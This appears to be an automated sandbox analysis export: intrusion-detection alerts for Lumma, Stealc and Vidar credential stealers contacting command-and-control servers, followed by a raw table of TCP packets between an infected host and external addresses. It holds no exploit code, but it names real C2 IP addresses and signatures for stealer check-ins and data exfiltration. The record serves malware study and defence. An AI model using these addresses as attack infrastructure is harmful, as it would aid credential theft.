2024-10-02T09:42:17.992636+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49802	172.67.208.141	443	TCP
2024-10-02T09:42:19.183858+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49804	188.114.96.3	443	TCP
2024-10-02T09:42:19.183858+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49804	188.114.96.3	443	TCP
2024-10-02T09:42:19.860183+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49805	49.12.197.9	443	TCP
2024-10-02T09:42:20.305595+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49806	104.21.56.150	443	TCP
2024-10-02T09:42:20.305595+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49806	104.21.56.150	443	TCP
2024-10-02T09:42:21.728661+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49807	104.21.84.18	443	TCP
2024-10-02T09:42:21.728661+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49807	104.21.84.18	443	TCP
2024-10-02T09:42:21.973991+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49808	49.12.197.9	443	TCP
2024-10-02T09:42:22.371927+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49809	46.8.231.109	80	TCP
2024-10-02T09:42:22.597711+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49809	46.8.231.109	80	TCP
2024-10-02T09:42:22.634887+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	46.8.231.109	80	192.168.2.4	49809	TCP
2024-10-02T09:42:22.805678+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49810	104.21.18.193	443	TCP
2024-10-02T09:42:22.805678+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49810	104.21.18.193	443	TCP
2024-10-02T09:42:22.813485+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49809	46.8.231.109	80	TCP
2024-10-02T09:42:22.862005+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	46.8.231.109	80	192.168.2.4	49809	TCP
2024-10-02T09:42:23.376496+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49809	46.8.231.109	80	TCP
2024-10-02T09:42:23.557167+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49809	46.8.231.109	80	TCP
2024-10-02T09:42:23.651100+0200	2054495	ET MALWARE Vidar Stealer Form Exfil	1	192.168.2.4	49811	45.132.206.251	80	TCP
2024-10-02T09:42:23.805540+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49812	172.67.195.67	443	TCP
2024-10-02T09:42:23.805540+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49812	172.67.195.67	443	TCP
2024-10-02T09:42:25.110723+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49813	104.21.17.174	443	TCP
2024-10-02T09:42:25.110723+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49813	104.21.17.174	443	TCP
2024-10-02T09:42:26.403985+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49809	46.8.231.109	80	TCP
2024-10-02T09:42:26.429175+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49816	49.12.197.9	443	TCP
2024-10-02T09:42:27.190574+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49809	46.8.231.109	80	TCP
2024-10-02T09:42:27.371909+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49817	104.21.16.12	443	TCP
2024-10-02T09:42:27.371909+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49817	104.21.16.12	443	TCP
2024-10-02T09:42:27.795138+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49818	49.12.197.9	443	TCP
2024-10-02T09:42:27.813890+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49819	46.8.231.109	80	TCP
2024-10-02T09:42:29.059752+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49819	46.8.231.109	80	TCP
2024-10-02T09:42:29.542408+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49820	49.12.197.9	443	TCP
2024-10-02T09:42:29.711278+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49821	46.8.231.109	80	TCP
2024-10-02T09:42:30.387628+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49821	46.8.231.109	80	TCP
2024-10-02T09:42:30.828544+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49822	49.12.197.9	443	TCP
2024-10-02T09:42:31.539678+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	49.12.197.9	443	192.168.2.4	49822	TCP
2024-10-02T09:42:32.310288+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49823	49.12.197.9	443	TCP
2024-10-02T09:42:33.001551+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	49.12.197.9	443	192.168.2.4	49823	TCP
2024-10-02T09:42:33.240246+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49824	147.45.44.104	80	TCP
2024-10-02T09:42:33.798709+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49825	49.12.197.9	443	TCP
2024-10-02T09:42:35.092990+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49826	49.12.197.9	443	TCP
2024-10-02T09:42:38.294901+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49828	49.12.197.9	443	TCP
2024-10-02T09:42:38.298990+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49827	172.67.208.141	443	TCP
2024-10-02T09:42:38.298990+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49827	172.67.208.141	443	TCP
2024-10-02T09:42:39.253738+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49829	188.114.96.3	443	TCP
2024-10-02T09:42:39.253738+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49829	188.114.96.3	443	TCP
2024-10-02T09:42:39.330354+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49830	49.12.197.9	443	TCP
2024-10-02T09:42:40.348664+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49831	104.21.56.150	443	TCP
2024-10-02T09:42:40.348664+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49831	104.21.56.150	443	TCP
2024-10-02T09:42:42.467917+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49832	104.21.84.18	443	TCP
2024-10-02T09:42:42.467917+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49832	104.21.84.18	443	TCP
2024-10-02T09:42:43.811989+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49834	104.21.18.193	443	TCP
2024-10-02T09:42:43.811989+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49834	104.21.18.193	443	TCP
2024-10-02T09:42:44.890071+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49836	172.67.195.67	443	TCP
2024-10-02T09:42:44.890071+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49836	172.67.195.67	443	TCP
2024-10-02T09:42:45.812527+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49835	172.67.74.152	80	TCP
2024-10-02T09:42:46.061303+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49838	104.21.17.174	443	TCP
2024-10-02T09:42:46.061303+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49838	104.21.17.174	443	TCP
2024-10-02T09:42:48.995520+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49841	104.21.16.12	443	TCP
2024-10-02T09:42:48.995520+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49841	104.21.16.12	443	TCP
2024-10-02T09:42:51.926077+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49843	49.12.197.9	443	TCP
2024-10-02T09:42:53.335362+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49844	49.12.197.9	443	TCP
2024-10-02T09:42:54.710418+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49846	49.12.197.9	443	TCP
2024-10-02T09:42:56.089844+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49849	49.12.197.9	443	TCP
2024-10-02T09:42:56.703206+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49850	172.67.74.152	80	TCP
2024-10-02T09:42:56.807905+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	49.12.197.9	443	192.168.2.4	49849	TCP
2024-10-02T09:42:57.630057+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49852	49.12.197.9	443	TCP
2024-10-02T09:42:58.323797+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	49.12.197.9	443	192.168.2.4	49852	TCP
2024-10-02T09:42:59.069211+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49853	49.12.197.9	443	TCP
2024-10-02T09:43:00.176123+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49854	49.12.197.9	443	TCP
2024-10-02T09:43:03.251397+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49855	49.12.197.9	443	TCP
2024-10-02T09:43:04.272088+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49856	49.12.197.9	443	TCP
2024-10-02T09:43:08.489928+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49859	49.12.197.9	443	TCP
2024-10-02T09:43:09.799420+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49862	49.12.197.9	443	TCP
2024-10-02T09:43:10.744177+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49863	104.26.13.205	80	TCP
2024-10-02T09:43:11.144684+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49864	49.12.197.9	443	TCP
2024-10-02T09:43:12.511919+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49867	49.12.197.9	443	TCP
2024-10-02T09:43:13.223182+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	49.12.197.9	443	192.168.2.4	49867	TCP
2024-10-02T09:43:13.906402+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49870	49.12.197.9	443	TCP
2024-10-02T09:43:14.606293+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	49.12.197.9	443	192.168.2.4	49870	TCP
2024-10-02T09:43:14.751863+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49871	104.26.13.205	80	TCP
2024-10-02T09:43:15.357992+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49873	49.12.197.9	443	TCP
2024-10-02T09:43:16.348799+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49874	49.12.197.9	443	TCP
2024-10-02T09:43:19.295407+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49875	49.12.197.9	443	TCP
2024-10-02T09:43:20.571222+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49876	49.12.197.9	443	TCP
2024-10-02T09:43:27.239810+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49880	104.26.13.205	80	TCP
2024-10-02T09:43:35.932660+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49885	104.26.13.205	80	TCP
2024-10-02T09:44:10.664548+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49890	104.26.13.205	80	TCP
2024-10-02T09:44:25.690313+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49895	104.26.13.205	80	TCP
2024-10-02T09:44:46.953419+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49900	104.26.13.205	80	TCP
2024-10-02T09:45:04.016147+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49905	104.26.13.205	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 09:40:59.509551048 CEST	49730	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:40:59.509665012 CEST	443	49730	104.21.54.163	192.168.2.4
Oct 2, 2024 09:40:59.509756088 CEST	49730	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:40:59.525152922 CEST	49730	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:40:59.525172949 CEST	443	49730	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:00.002810955 CEST	443	49730	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:00.003017902 CEST	49730	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:00.009157896 CEST	49730	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:00.009232998 CEST	443	49730	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:00.009679079 CEST	443	49730	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:00.062438965 CEST	49730	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:00.184694052 CEST	49730	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:00.227477074 CEST	443	49730	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:00.281162024 CEST	443	49730	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:00.303059101 CEST	49730	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:00.303116083 CEST	443	49730	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:00.580686092 CEST	443	49730	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:00.580904007 CEST	443	49730	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:00.581578016 CEST	49730	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:00.584561110 CEST	49730	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:00.724823952 CEST	49731	80	192.168.2.4	172.67.74.152
Oct 2, 2024 09:41:00.730221987 CEST	80	49731	172.67.74.152	192.168.2.4
Oct 2, 2024 09:41:00.730304956 CEST	49731	80	192.168.2.4	172.67.74.152
Oct 2, 2024 09:41:00.747755051 CEST	49731	80	192.168.2.4	172.67.74.152
Oct 2, 2024 09:41:00.753133059 CEST	80	49731	172.67.74.152	192.168.2.4
Oct 2, 2024 09:41:01.200304985 CEST	80	49731	172.67.74.152	192.168.2.4
Oct 2, 2024 09:41:01.202099085 CEST	49732	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:01.202179909 CEST	443	49732	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:01.202256918 CEST	49732	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:01.202672958 CEST	49732	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:01.202697992 CEST	443	49732	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:01.249814987 CEST	49731	80	192.168.2.4	172.67.74.152
Oct 2, 2024 09:41:01.681977987 CEST	443	49732	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:01.683635950 CEST	49732	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:01.683680058 CEST	443	49732	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:01.803858042 CEST	443	49732	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:01.804162979 CEST	49732	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:01.804209948 CEST	443	49732	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:02.189187050 CEST	443	49732	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:02.189357042 CEST	443	49732	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:02.189428091 CEST	49732	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:02.189845085 CEST	49732	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:02.201461077 CEST	49731	80	192.168.2.4	172.67.74.152
Oct 2, 2024 09:41:02.209522009 CEST	80	49731	172.67.74.152	192.168.2.4
Oct 2, 2024 09:41:02.312465906 CEST	80	49731	172.67.74.152	192.168.2.4
Oct 2, 2024 09:41:02.314237118 CEST	49733	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:02.314322948 CEST	443	49733	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:02.314409018 CEST	49733	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:02.314804077 CEST	49733	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:02.314843893 CEST	443	49733	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:02.359210014 CEST	49731	80	192.168.2.4	172.67.74.152
Oct 2, 2024 09:41:02.782728910 CEST	443	49733	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:02.787885904 CEST	49733	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:02.787967920 CEST	443	49733	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:02.895232916 CEST	443	49733	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:02.895582914 CEST	49733	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:02.895641088 CEST	443	49733	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:03.195890903 CEST	443	49733	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:03.196088076 CEST	443	49733	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:03.203424931 CEST	443	49733	104.21.54.163	192.168.2.4
Oct 2, 2024 09:41:03.203531027 CEST	49733	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:03.207916975 CEST	49733	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:03.342561007 CEST	49733	443	192.168.2.4	104.21.54.163
Oct 2, 2024 09:41:03.346662045 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:03.352087021 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:03.355823994 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:03.358767033 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:03.363965988 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:03.992382050 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:03.992440939 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:03.992477894 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:03.992487907 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:03.992512941 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:03.992552042 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:03.992561102 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:03.992588043 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:03.992623091 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:03.992629051 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:03.992655993 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:03.992696047 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:03.992710114 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:03.992733955 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:03.992774010 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:03.998055935 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:03.998105049 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:03.998142004 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:03.998152018 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.046695948 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.082879066 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.082923889 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.082957029 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.082959890 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.082998991 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.083040953 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.083096981 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.083149910 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.083184004 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.083184004 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.083219051 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.083252907 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.083261013 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.084106922 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.084142923 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.084151030 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.084181070 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.084219933 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.084634066 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.084686995 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.084722996 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.084728003 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.084758997 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.084798098 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.084804058 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.085645914 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.085680962 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.085690975 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.085726023 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.085761070 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.085766077 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.140443087 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.173037052 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.173120975 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.173135042 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.173150063 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.173160076 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.173167944 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.173183918 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.173187971 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.173219919 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.173589945 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.173605919 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.173631907 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.173645973 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.173646927 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.173664093 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.173680067 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.173681021 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.173713923 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.174288034 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.174314976 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.174330950 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.174351931 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.174432039 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.174457073 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.174465895 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.174475908 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.174493074 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.174511909 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.175287962 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.175302982 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.175319910 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.175324917 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.175354958 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.175362110 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.175378084 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.175412893 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.175431013 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.175447941 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.175524950 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.176211119 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.176285028 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.176311016 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.176320076 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.176328897 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.176343918 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.176361084 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.218574047 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.262996912 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.263017893 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.263035059 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.263055086 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.263195038 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.263211966 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.263231993 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.263236046 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.263258934 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.263271093 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.263277054 CEST	80	49734	147.45.44.104	192.168.2.4
